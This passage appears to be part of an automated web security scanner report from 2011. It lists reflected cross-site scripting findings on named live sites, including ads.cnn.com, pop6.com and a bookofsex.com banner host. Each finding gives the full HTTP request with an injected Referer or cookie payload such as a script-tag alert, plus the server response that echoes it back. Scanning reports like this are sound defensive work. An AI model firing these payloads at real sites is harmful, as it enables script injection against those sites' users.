Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:07:34 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,A34H6pWAGCJPfhzZNI1EmpzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki45-14.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13368
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
=(timedout==1)?'5000+':pageEndTime-pageStartTime;var sessionId=escape("GQ5`J^U@jEUU 1313434702 50.23.123.106 ");var pageName=escape(location.pathname);var referer="http://www.google.com/search?hl=en&q=c3b24"-alert(1)-"59d37ff595f";var refererPageName=getRefererPageName(referer);var screenResolution=screen.width+"x"+screen.height;var glean=new Image();var ffProto=("https:"==document.location.protocol)?"https://":"http://";var r
...[SNIP]...

1.69. http://banners.bookofsex.com/go/page/iframe_cm_26400 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eccc2"-alert(1)-"1c6e02646aa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/page/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=eccc2"-alert(1)-"1c6e02646aa
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:59:12 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,O0W/sZQoVB2ERTr5ZZM8EhPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki55-35.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 24493
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<]@DQN[>L 1313434558 50.23.123.106 ");var pageName=escape(location.pathname);var referer="http://www.google.com/search?hl=en&q=eccc2"-alert(1)-"1c6e02646aa";var refererPageName=getRefererPageName(referer);var screenResolution=screen.width+"x"+screen.height;var glean=new Image();var ffProto=("https:"==document.location.protocol)?"https://":"http://";var r
...[SNIP]...

1.70. http://pop6.com/p/memsearch.cgi [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acc0e"-alert(1)-"5394e928717621386 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /p/memsearch.cgi?who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find_sex=2&min_age=18&max_age=35&country=United+States&state=California&zipcode=10010 HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=acc0e"-alert(1)-"5394e928717621386
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:10:06 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,kRs57bKB2_5chyvK5CT70nu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii82-33.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75954
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
=(timedout==1)?'5000+':pageEndTime-pageStartTime;var sessionId=escape("^5L\@NF^^jH6 1313434662 50.23.123.106 ");var pageName=escape(location.pathname);var referer="http://www.google.com/search?hl=en&q=acc0e"-alert(1)-"5394e928717621386";var refererPageName=getRefererPageName(referer);var screenResolution=screen.width+"x"+screen.height;var glean=new Image();var ffProto=("https:"==document.location.protocol)?"https://":"http://";var r
...[SNIP]...

1.71. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes¶ms.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f56"><script>alert(1)</script>79814dffe55 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-172f56"><script>alert(1)</script>79814dffe55

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:05 GMT
Server: Apache
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:05 GMT
Pragma: no-cache
Content-Length: 3278
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
14&Targets=91904,90974,1515,75426&Values=46,60,81,100,150,679,1588,2677,2746,4443,48137,52263,52897,56058,58570,58702,61089,61887,61908,61913,63267,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-172f56"><script>alert(1)</script>79814dffe55%2CTID%2C1604588547342336%2CTIL%2C392593343132&Redirect=http://edition.cnn.com/SPORT/">
...[SNIP]...

1.72. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes¶ms.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c5c7"><script>alert(1)</script>fa0472838cf was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-14c5c7"><script>alert(1)</script>fa0472838cf; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:41 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:41 GMT
Pragma: no-cache
Content-Length: 1097
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=730,2247,2743,2823,3285,9496,9779,9781,9853,10381,16113,17251,18517,18982,19419,19974,30544,30550,32594,3
...[SNIP]...
,1067,1285,1588,1678,1686,1735,2677,2746,4443,37359,47128,47457,52263,52779,52897,56058,56872,57896,58570,58702,61089,61263,61887,61908,61913,63267,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-14c5c7"><script>alert(1)</script>fa0472838cf%2CTID%2C1604588547342336%2CTIL%2C392593343133&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.73. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eec6"><script>alert(1)</script>17ca6eaa7ac was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-12eec6"><script>alert(1)</script>17ca6eaa7ac; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:20 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:20 GMT
Pragma: no-cache
Content-Length: 3581
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
89,1678,1686,1735,3443,3445,3458,4443,37359,47128,47457,52263,52901,56058,56872,57810,57896,58702,61089,61263,61887,61908,61913,63267,116196,116271,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-12eec6"><script>alert(1)</script>17ca6eaa7ac%2CTIL%2C1313434106153&Redirect=http://www.money.com">
...[SNIP]...

1.74. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph¶ms.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 662fd"><script>alert(1)</script>dd428081f4e was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1662fd"><script>alert(1)</script>dd428081f4e; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:54 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:54 GMT
Pragma: no-cache
Content-Length: 3516
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
7,1067,1285,1589,1678,1686,1735,2218,3445,3449,3563,4443,37359,47128,47457,52263,52901,54553,56058,56872,57896,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1662fd"><script>alert(1)</script>dd428081f4e&Redirect=https://subs.timeinc.net/MO/mo_cc08081495.jhtml?">
...[SNIP]...

1.75. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1759"><script>alert(1)</script>5ab4b1dab41 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1c1759"><script>alert(1)</script>5ab4b1dab41; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Pragma: no-cache
Content-Length: 3586
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
67,1285,1589,1678,1686,1735,3448,3459,4443,37359,47128,47457,52263,52901,56058,56872,57810,58702,61263,61887,61908,61913,63267,116201,116268,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1c1759"><script>alert(1)</script>5ab4b1dab41%2CTIL%2C1313433990029&Redirect=http://www.money.com">
...[SNIP]...

